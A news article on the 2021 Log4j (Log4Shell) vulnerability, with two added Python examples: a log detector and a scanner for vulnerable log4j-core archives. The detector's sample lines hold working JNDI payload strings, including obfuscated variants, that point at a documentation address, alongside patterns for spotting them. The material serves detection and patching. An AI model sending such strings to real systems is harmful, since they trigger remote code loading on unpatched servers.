A flaw in a widely used piece of software has left millions of web servers vulnerable to hacker abuse
December 13, 2021
A major vulnerability has been discovered in a piece of software called Log4j, which is used by millions of web servers. The bug leaves them vulnerable to attacks, and teams around the world are trying to patch affected systems before hackers can exploit them. “The internet is on fire right now,” said Adam Meyers of security firm Crowdstrike.
The problem with Log4j was first noticed in the video game Minecraft, but it soon became clear that the impact was much greater. The software is used in millions of web applications, including Apple’s iCloud. Attacks that exploit the bug, known as Log4Shell attacks, have been happening since Dec. 9, Crowdstrike said.
The director of the US Cybersecurity and Infrastructure Security Agency, Jen Easterly, says the security flaw poses a “serious risk” to the internet. “This vulnerability, widely exploited by a growing number of threat actors, poses an urgent challenge to network defenders given its wide use,” she says.
What exactly is Log4j?
Almost every piece of software you use keeps a record of errors and other important events known as logs. Instead of creating their own logging system, many software developers use the open source Log4j, making it one of the most common logging packages in the world.
Not having to reinvent the wheel is a huge benefit, but the popularity of Log4j has now become a global security problem. The flaw affects millions of pieces of software running on millions of machines that we all interact with.
What does the flaw allow hackers to do?
Attackers can trick Log4j into executing malicious code by getting it to log a message that contains a specially crafted string of text. Log4j treats certain patterns in the messages it logs as lookups to be evaluated, and one kind of lookup can make it fetch and run code from a server of the attacker’s choosing. How hackers get the string into a log varies from program to program, but in Minecraft it has been reported to have happened via chat boxes: a log entry is created to archive each chat message, so if the dangerous text is sent from one player to another, it ends up in a log.
In another case, Apple’s servers were found to log the name an iPhone’s owner gives the device in its settings, so the string could be delivered that way. However it is delivered, once the string has been logged the attacker can run any code they want on the server, for example to steal or delete sensitive data.
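The following is an added example, not code from the article or from the Log4j project: a small Python detector that looks for the lookup string in log lines of the kind described above. Because attackers quickly started hiding the word "jndi" inside nested Log4j lookups (forms such as ${lower:j}, ${::-j} and ${env:NaN:-j} were widely seen), it first peels those lookups away and only then searches for the tell-tale ${jndi:...} pattern. The sample lines are constructed for the example (the address 203.0.113.7 is a documentation address, not a real host), and the lookup emulation covers only the obfuscations named in the code.

```python
import re

# Constructed sample log lines (not captured traffic): a Minecraft-style chat
# line, device-name fields of the kind the article describes, and benign text.
# 203.0.113.7 is a documentation address, not a real attacker host.
SAMPLE_LINES = [
    "[Server thread/INFO]: <alice> hello everyone",
    "[Server thread/INFO]: <mallory> ${jndi:ldap://203.0.113.7:1389/a}",
    "device_name=${${lower:j}${lower:n}di:ldap://203.0.113.7/x}",
    "device_name=${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7/y}",
    "user-agent=Mozilla/5.0 (nothing to see here)",
    "text=${${env:NaN:-j}ndi${env:NaN:-:}ldap://203.0.113.7/z}",
]

# An innermost ${...} lookup: its body contains no further '${'.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# The lookup we are hunting for once obfuscation has been peeled away.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def resolve_lookup(body: str) -> str:
    """Emulate the Log4j lookups attackers nest to hide the word 'jndi'."""
    if body.lower().startswith("jndi:"):
        return "${" + body + "}"          # the payload itself: leave it for JNDI to match
    if ":-" in body:                      # default-value syntax, e.g. ${env:NaN:-j} or ${::-j}
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    return "${" + body + "}"              # any other lookup: keep as written


def normalize(line: str, max_rounds: int = 20) -> str:
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(lambda m: resolve_lookup(m.group(1)), line)
        if resolved == line:
            break
        line = resolved
    return line


def find_log4shell(line: str):
    """Return the JNDI protocol (ldap, rmi, dns, ...) if the line carries a lookup, else None."""
    m = JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Index and protocol of every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        proto = find_log4shell(line)
        if proto:
            hits.append((i, proto))
    return hits


if __name__ == "__main__":
    for i, proto in scan(SAMPLE_LINES):
        print(f"line {i}: JNDI lookup via {proto} -> {normalize(SAMPLE_LINES[i])}")
```

Matching on the raw text alone would miss three of the four malicious lines above, which is why the normalisation step comes first; a detector like this is a stopgap for spotting attempts in existing logs, not a substitute for updating the library.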
Why was this error not found before?
The code that makes up open source software can be viewed, executed and even edited – with checks and balances – by anyone. This transparency can make software more robust and secure, because many eyes work on it. But no software can be guaranteed to be safe.
The problem that enables the Log4Shell attack has been in the code for quite some time, but was only recognised by a security researcher at the Chinese cloud computing company Alibaba Cloud late last month. He immediately reported the issue to the Apache Software Foundation, the US nonprofit that oversees hundreds of open source projects, including Log4j, to give it time to fix the issue before it was publicly disclosed.
This kind of responsible disclosure is standard practice for bugs like this, although some bug hunters instead sell such vulnerabilities to hackers, allowing them to be used quietly for months or even years, including in surveillance software sold to governments around the world.
What happens now?
Apache ranked the vulnerability, tracked as CVE-2021-44228, as “critical” and rushed to develop a fix. Now hundreds of thousands of IT teams are working to update Log4j to version 2.15.0, which was released before the vulnerability was made public and usually solves the problem. Because Log4j is often pulled in indirectly, as a dependency of other libraries or bundled inside application archives, teams should also search their code and deployed software for copies of it, and watch for hacking attempts.
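As an added example (not from the article or the Log4j project), here is a Python scanner of the kind teams wrote to find those copies: it walks a directory for .jar, .war and .ear archives, looks for the JndiLookup class that the exploit relies on, reads the version from the library’s Maven metadata, and recurses into archives nested inside other archives, which is where Log4j usually hides. The class path and pom.properties location are the real ones from log4j-core; the archives the demo builds are constructed stand-ins containing only a class-file magic number, not real Log4j binaries; and treating anything below 2.15.0 as vulnerable follows the article’s advice rather than the project’s later advisories.

```python
import io
import os
import re
import shutil
import tempfile
import zipfile

# Paths inside a Log4j 2 core jar: the class the exploit relies on and the
# Maven metadata that records the library's version.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear")


def version_from_props(data: bytes):
    """Pull 'version=...' out of a pom.properties file, or None if absent."""
    for line in data.decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def is_fixed(version) -> bool:
    """Anything below 2.15.0, or with no readable version, is treated as
    vulnerable, matching the article's advice to update to 2.15.0."""
    m = re.match(r"(\d+)\.(\d+)", version or "")
    return bool(m) and (int(m.group(1)), int(m.group(2))) >= (2, 15)


def inspect_archive(blob: bytes, name: str, findings: list) -> None:
    """Record (name, version) if this archive contains JndiLookup, then recurse
    into archives nested inside it, since applications often bundle log4j-core."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    if JNDI_CLASS in names:
        version = version_from_props(zf.read(POM_PROPS)) if POM_PROPS in names else None
        findings.append((name, version))
    for inner in sorted(names):
        if inner.lower().endswith(ARCHIVE_EXTS):
            inspect_archive(zf.read(inner), f"{name}!{inner}", findings)


def scan_tree(root: str):
    """Walk a directory and return (relative path, version, fixed?) for every
    archive, nested or not, that carries JndiLookup."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXTS):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), os.path.relpath(path, root), findings)
    return sorted((n, v, is_fixed(v)) for n, v in findings)


def build_demo_tree() -> str:
    """Create constructed stand-in archives (not real Log4j binaries) to scan."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    fake_class = b"\xca\xfe\xba\xbe"  # Java class-file magic number, nothing more

    def write_archive(target, entries):
        with zipfile.ZipFile(target, "w") as zf:
            for entry, data in entries.items():
                zf.writestr(entry, data)

    write_archive(os.path.join(root, "log4j-core-2.14.1.jar"),
                  {JNDI_CLASS: fake_class, POM_PROPS: b"version=2.14.1\n"})
    write_archive(os.path.join(root, "log4j-core-2.15.0.jar"),
                  {JNDI_CLASS: fake_class, POM_PROPS: b"version=2.15.0\n"})
    write_archive(os.path.join(root, "unrelated.jar"),
                  {"com/example/App.class": fake_class})
    # A web application archive with an old log4j-core buried in WEB-INF/lib.
    buried = io.BytesIO()
    write_archive(buried, {JNDI_CLASS: fake_class, POM_PROPS: b"version=2.13.3\n"})
    write_archive(os.path.join(root, "app.war"),
                  {"WEB-INF/lib/log4j-core-2.13.3.jar": buried.getvalue()})
    return root


def demo():
    """Scan the constructed tree, clean it up, and return the findings."""
    root = build_demo_tree()
    try:
        return scan_tree(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for name, version, fixed in demo():
        print(f"{'OK        ' if fixed else 'VULNERABLE'} {name} (version {version or 'unknown'})")
```

Point scan_tree at a real deployment directory to use it; the nested-archive recursion is what catches the log4j-core buried inside app.war, which a check of file names alone would miss.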
While patches to fix these types of issues can appear very quickly, especially when responsibly disclosed to the development team, they take time for everyone to apply. Computers and web services are now so complex and so layered with dozens of stacked levels of abstraction, code running on code, on code, that it can take months to update all of these services.
And there will always be those who never do. Many dusty corners of the internet are propped up on outdated hardware with outdated, vulnerable code — something that hackers can easily exploit.